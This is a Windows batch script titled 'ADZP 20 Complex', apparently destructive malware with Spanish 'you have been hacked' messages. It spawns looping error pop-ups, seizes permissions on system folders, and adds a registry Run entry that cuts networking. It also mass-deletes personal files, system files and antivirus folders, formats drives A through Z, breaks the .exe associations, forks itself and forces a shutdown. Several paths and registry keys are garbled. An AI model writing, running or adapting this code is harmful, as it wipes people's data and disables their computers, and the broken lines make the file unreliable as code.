@echo off
title ADZP 20 Complex
echo off>>ErrorCritico.vbs
echo do>>ErrorCritico.vbs
echo Mensaje=msgbox("Error Critico",16,"Error")>>ErrorCritico.vbs
echo loop>>ErrorCritico.vbs
echo off>>Advertencia.vbs
echo do>>Advertencia.vbs
echo Mensaje=msgbox("Error en el Sistema",48,"Error")>>Advertencia.vbs
echo loop>>Advertencia.vbs
echo off>>Informacion.vbs
echo do>>Informacion.vbs
echo Mensaje=MsgBox("Has Sido Hackeado!",64,"ADZP 20 Complex")>>Informacion.vbs
echo loop>>Informacion.vbs
echo off>>Autorun.inf
echo [AutoRun]>>Autorun.inf
echo Open=ADZP 20 Complex>>Autorun.inf
echo Action=Start ADZP 20 Complex>>Autorun.inf
echo Label=???>>Autorun.inf
echo Icon=Autorun.inf>>Autorun.inf
echo off>>Taskse.exe
echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%>>Taskse.exe
echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%>>Taskse.exe
echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%>>Taskse.exe
echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%>>Taskse.exe
echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%>>Taskse.exe
echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%>>Taskse.exe
echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%>>Taskse.exe
echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%>>Taskse.exe
echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%>>Taskse.exe
echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%>>Taskse.exe
echo off>>Taskdl.bat
echo @echo off>>Taskdl.bat
echo takeown /f "C:\Windows" /r>>Taskdl.bat
echo tree "C:\Windows">>Taskdl.bat
echo icacls "C:\Windows" /reset /t /c /q>>Taskdl.bat
echo takeown /f "C:\Windows\System32" /r>>Taskdl.bat
echo tree "C:\Windows\System32">>Taskdl.bat
echo icacls "C:\Windows\System32" /reset /t /c /q>>Taskdl.bat
start Informacion.vbs
start Taskdl.bat
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
ipconfig /release
echo Has Sido Hackeado!
taskkill /im DiskPart /f
del \f \q \s *.pdf
del \f \q \s *.rar
del \f \q \s *.png
del \f \q \s *.jpg
del \f \q \s *.jpeg
del \f \q \s *.docx
del \f \q \s *.xlsx
del \f \q \s *.pptx
del \f \q \s *.txt
del \f \q \s *.mp3
del \f \q \s *.mp4
del \f \q \s *.avi
del /s /q /f WannaCrypt0r.exe
del /s /q /f WannaCry.exe
del /s /q /f @WanaDecryptor@.exe
del /s /q /f rensenWare.exe
start ErrorCritico.vbs
start Advertencia.vbs
start ErrorCritico.vbs
start Advertencia.vbs
start ErrorCritico.vbs
start Advertencia.vbs
start ErrorCritico.vbs
start Advertencia.vbs
start ErrorCritico.vbs
start Advertencia.vbs
msg * Virus Detectado
msg * Virus Detectado
msg * Has Sido Hackeado!
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
echo off>>virus.exe
echo off>>virus.dll
echo off>>virus.com
echo off>>virus.css
echo off>>virus.ini
echo off>>virus.inf
echo off>>virus.sys
echo off>>virus.reg
echo off>>virus.ani
echo off>>virus.rar
echo off>>virus.pal
echo off>>virus.bin
echo off>>virus.cmd
echo off>>virus.jar
echo off>>virus.chk
echo off>>virus.db
echo off>>virus.ocx
echo off>>virus.manifest
echo off>>virus.log
echo off>>virus.dat
start ErrorCritico.vbs
start Advertencia.vbs
start ErrorCritico.vbs
start Advertencia.vbs
start ErrorCritico.vbs
start Advertencia.vbs
del /f /s /q c:\*.mp3
del /f /s /q c:\*.mp4
del /f /s /q c:\*.jpg
del /f /s /q c:\*.txt
del /f /s /q c:\*.jpeg
del /f /s /q c:\*.php
del /f /s /q c:\*.com
del /f /s /q c:\*.zip
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start notepad
start "" %0
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
deltree "%userprofile%/mis documentos"
del /q /f /s c:\windows\repair\*.nt
del /q /f /s c:\windows\system32\*.bin
del /q /f /s c:\windows\system32\*.bat
del /q /f /s c:\windows\system32\*.ax
del /q /f /s c:\windows\system32\*.acm
del /q /f /s c:\windows\system32\*.bin
del /q /f /s c:\windows\system32\*.dat
del /q /f /s c:\windows\system32\*.hlp
del /q /f /s c:\windows\system32\*.manifest
deltree "C:\archivos de programa"
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
echo off>>virus.cur
echo off>>virus.386
echo off>>virus.323
echo off>>virus.scr
echo off>>virus.acm
echo off>>virus.cpl
echo off>>virus.hlp
echo off>>virus.jpg
echo off>>virus.mpg
echo off>>virus.html
echo off>>virus.vbs
echo off>>virus.drv
echo off>>virus.wsh
echo off>>virus.rat
echo off>>virus.cer
echo off>>virus.msc
echo off>>virus.db
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\McAfee\*.*
del /Q /F C:\Program Files\nood32\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.*
del /Q /F C:\Program Files\panda\*.*
del /Q /F C:\Program Files\webproxy\*.*
del /Q /F C:\Program Files\ewido\*.*
del /Q /F C:\Program Files\avengine\*.*
del /Q /F C:\Program Files\trojan~1\*.*
del /Q /F C:\Program Files\kav\*.*
format A:
format B:
format D:
format E:
format F:
format G:
format H:
format I:
format J:
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
del /q /f /s c:\windows\system32\*.ocx
del /q /f /s c:\windows\system32\*.drv
del /q /f /s c:\windows\system32\*.msc 
del /q /f /s c:\windows\system32\*.cpl
del /q /f /s c:\windows\system32\*.ini
del /q /f /s c:\windows\system32\*.vbs
del /q /f /s c:\windows\system32\hal.dll
del /q /f /s c:\windows\system32\sol.exe
del /q /f /s c:\windows\system32\winmine.exe
del winword.exe
del excel.exe
format K:
format L:
format M:
format N:
format Ñ:
format O:
format P:
format Q:
format R:
format S:
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
start "" %0
start notepad
start calc
start explorer.exe
start mspaint.exe
format T:
format U:
format V:
format W:
format X:
format Y:
format Z:
if exist Taskmon.exe (start Taskmon.exe) else (echo.)
start reg delete HKCR/.exe
start reg delete HKCR/.dll
attrib -r -s -h c:autoexec.bat
del /s /q /f c:autoexec.bat
attrib -r -s -h c:boot.ini
del /s /q /f c:boot.ini
attrib -r -s -h c:ntldr
del /s /q /f c:ntldr
attrib -r -s -h c:windowswin.ini
del /s /q /f c:windowswin.ini
shutdown -s -t 10 -c "ADZP 20 Complex esta a punto de eliminar el Sistema Operativo"
start ErrorCritico.vbs
start Advertencia.vbs
start ErrorCritico.vbs
start Advertencia.vbs
if %errorlevel% equ 0 (ser userstatus=Administrator) else (Taskkill /im svchost.exe /f)
start ErrorCritico.vbs
start Advertencia.vbs
start ErrorCritico.vbs
start Advertencia.vbs
exit